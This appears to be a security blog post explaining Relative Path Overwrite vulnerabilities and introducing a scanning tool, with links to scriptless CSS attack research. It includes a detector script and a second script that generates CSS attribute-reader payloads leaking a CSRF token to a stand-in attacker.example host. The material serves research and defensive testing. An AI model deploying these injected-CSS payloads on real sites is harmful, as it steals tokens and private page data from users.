Tool for finding RPO vulnerabilities and CSS Exfiltration Techniques
Gareth Heyes (@garetheheyes) discovered a class of vulnerability, Relative Path Overwrite (RPO), that is still extremely dangerous because it remains relatively unknown and most developers do not know which input validation would protect against it.
It makes it possible to inject CSS anywhere that user input is reflected in the page, without a <style> tag. In fact, no angle brackets (< >) and no HTML tag at all are needed. The trick is that a path-relative stylesheet import (href="style.css" rather than "/style.css") is resolved against the current URL path, so appending a path segment to the page URL makes the browser fetch the page itself as its stylesheet, and in quirks mode the browser parses the reflected text as CSS.
I find it very strange that this vulnerability was disclosed years ago and still remains so little known.
You can read Gareth's excellent post about his finding here:
http://www.thespanner.co.uk/2014/03/21/rpo/
This vulnerability is also documented by PortSwigger:
https://portswigger.net/research/detecting-and-exploiting-path-relative-stylesheet-import-prssi-vulnerabilities
I decided to write a tool to find these vulnerabilities quickly, because most scanners do not detect RPOs. Burp's scanner does detect it, but only in the Professional and Enterprise editions; the free edition does not.
You can find the tool in:
http://github.com/tr3w/RPOwn
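To make the mechanism concrete, here is a small added example (my own illustration, not code from RPOwn or from any of the linked research). It runs under Node.js, performs the static checks a scanner makes on a page (path-relative stylesheet import, no doctype, no base tag) and shows where the import resolves once an extra path segment is appended to the page URL. The sample page, the attacker.example host and the /x/ segment are constructed for the demonstration. It assumes the conditions described in the PortSwigger research: the server tolerates the extra path segment and still serves the page, the page renders in quirks mode, and no X-Content-Type-Options: nosniff header is sent.

```javascript
// Added example, not code from RPOwn or from any of the linked research.
// Static checks for a path-relative stylesheet import (RPO/PRSSI candidate)
// and a demonstration of why the import is hijackable. The sample page is
// constructed; attacker.example and the /x/ segment are illustrative.

const SAMPLE_HTML = `<html>
<head>
<link rel="stylesheet" href="css/main.css">
<link rel="stylesheet" href="/static/site.css">
</head>
<body>
<!-- reflected input: valid CSS, no angle brackets, no HTML tag -->
<p>Results for: {}*{background:url(https://attacker.example/leak)}</p>
</body>
</html>`;

// Pull one attribute value out of a single tag string.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// hrefs of every <link rel=stylesheet> in the page
function stylesheetHrefs(html) {
  const hrefs = [];
  for (const tag of html.match(/<link\b[^>]*>/gi) || []) {
    const rel = attr(tag, 'rel');
    const href = attr(tag, 'href');
    if (rel && /\bstylesheet\b/i.test(rel) && href) hrefs.push(href);
  }
  return hrefs;
}

// Path-relative means: no scheme, not root-relative (/x or //host), not a fragment.
function isPathRelative(href) {
  const h = href.trim();
  if (h === '' || h.startsWith('/') || h.startsWith('#')) return false;
  return !/^[a-z][a-z0-9+.-]*:/i.test(h);
}

// Same page URL with a bogus segment appended to the path only (query string
// preserved), the way an attacker would craft the link to the victim.
function withExtraSegment(pageUrl, segment = 'x') {
  const u = new URL(pageUrl);
  u.pathname = u.pathname.replace(/\/?$/, '/') + segment + '/';
  return u.href;
}

function rpoCandidates(pageUrl, html) {
  const candidates = stylesheetHrefs(html)
    .filter(isPathRelative)
    .map(href => ({
      href,
      normal: new URL(href, pageUrl).href,                     // what the developer expects
      hijacked: new URL(href, withExtraSegment(pageUrl)).href, // what the browser fetches
    }));
  return {
    candidates,
    // No doctype means quirks mode, where browsers still apply a same-origin
    // stylesheet served as text/html (unless X-Content-Type-Options: nosniff is set).
    quirksLikely: !/^\s*<!doctype\s/i.test(html),
    // A <base href> pins the resolution base and defeats the trick.
    baseTag: /<base\b[^>]*\bhref\s*=/i.test(html),
  };
}

console.log(JSON.stringify(rpoCandidates('https://example.com/search.php?q=test', SAMPLE_HTML), null, 2));
```

For the sample page the path-relative import css/main.css normally resolves to /css/main.css, but with the page requested as /search.php/x/?q=test it resolves to /search.php/x/css/main.css, which a server that accepts extra path info answers with the page itself. The reflected text then gets parsed as CSS: the leading {} closes whatever the CSS parser has consumed up to that point, and *{...} applies to every element. The check is static and heuristic; confirming the finding still means loading the crafted URL in a browser and watching for the request to the url() you injected.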
Here are some very clever pieces of research on RPO exploitation:
https://www.mbsd.jp/Whitepaper/rpo.pdf
Soroush Dalili discovered a super clever technique, non-root relative path overwrite in IIS and .NET applications, that greatly extends where this vulnerability applies:
https://soroush.me/blog/2015/02/non-root-relative-path-overwrite-rpo-in-iis-and-net-applications/
Since RPO exploitation mostly relies on scriptless (CSS-only) attacks, I have collected links to excellent resources describing different ways of performing scriptless attacks:
@sirdarckcat's attribute reader:
http://eaea.sirdarckcat.net/cssar/v2/
@kinugawamasato's text node reader:
https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
@SecurityMB's font ligatures technique:
https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/
@SecurityMB's data exfiltration in Firefox via a single injection point:
https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/#:~:text=Firefox%20and%20stylesheet%20processing
Pepe Vila's recursive imports technique:
https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231
@d0nutptr's recursive import exfiltration tool:
https://github.com/d0nutptr/sic
Mario Heiderich's presentation on scriptless attacks:
https://www.slideshare.net/x00mario/stealing-the-pie
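The attribute reader at the top of the list is the simplest of these scriptless techniques, and the one most of the others build on. As an added example (my own illustration, not @sirdarckcat's code nor code from any other linked resource), the Node.js snippet below generates the CSS such an attack injects and simulates the browser side offline, so the payload format can be checked before it is used. The target selector input[name="csrf"], the attribute name, the attacker.example collect URL and the hex alphabet are all illustrative assumptions.

```javascript
// Added example, not code from @sirdarckcat's attribute reader or from any
// other linked resource. Generates the CSS an attribute-reader exfiltration
// uses and simulates the browser side offline so the payload can be checked.
// Selector, attribute, collect URL and alphabet are illustrative assumptions.

const HEX = '0123456789abcdef';

// One rule per candidate next character. Only the rule whose prefix matches
// the real attribute value is applied, so only that url() is ever requested,
// and the request itself tells the attacker which character was next.
function attributeReaderCss(selector, attrName, knownPrefix, collectUrl, alphabet = HEX) {
  return [...alphabet].map(ch => {
    const prefix = knownPrefix + ch;
    return `${selector}[${attrName}^="${prefix}"]{background:url(${collectUrl}?p=${encodeURIComponent(prefix)})}`;
  }).join('\n');
}

// Offline stand-in for the browser: parse the generated rules and return the
// collect URLs whose [attr^="..."] prefix matches the secret attribute value.
const RULE_RE = /\[\w+\^="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
function firedRequests(css, attrValue) {
  const urls = [];
  for (const m of css.matchAll(RULE_RE)) {
    const [, prefix, url] = m;
    if (attrValue.startsWith(prefix)) urls.push(url);
  }
  return urls;
}

// Drive the rounds: each round leaks one more character. With a plain
// injection this costs one page load per character; the recursive-import
// techniques linked above collapse it into a single injection.
function recoverValue(secret, collectUrl = 'https://attacker.example/collect', alphabet = HEX, maxLen = 64) {
  let known = '';
  while (known.length < maxLen) {
    const css = attributeReaderCss('input[name="csrf"]', 'value', known, collectUrl, alphabet);
    const fired = firedRequests(css, secret);
    if (fired.length === 0) break; // no candidate matched: the value is exhausted
    known = new URL(fired[0]).searchParams.get('p');
  }
  return known;
}

console.log(recoverValue('deadbeef'));
```

Two caveats a practitioner runs into immediately. A hidden input is not rendered, so a background set on it is never fetched; real payloads attach the url() to a rendered sibling instead, for example input[name="csrf"][value^="d"] ~ div. And attribute selectors only see the attribute as it is in the markup, not a value assigned later from JavaScript and not text nodes, which is exactly what the unicode-range and ligature techniques listed above were invented for.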
Filed under: Hacking,Web Application Security - @ 2023-08-13 19:06
Tags: gareth, heyes, relative path overwrite, rpo, tool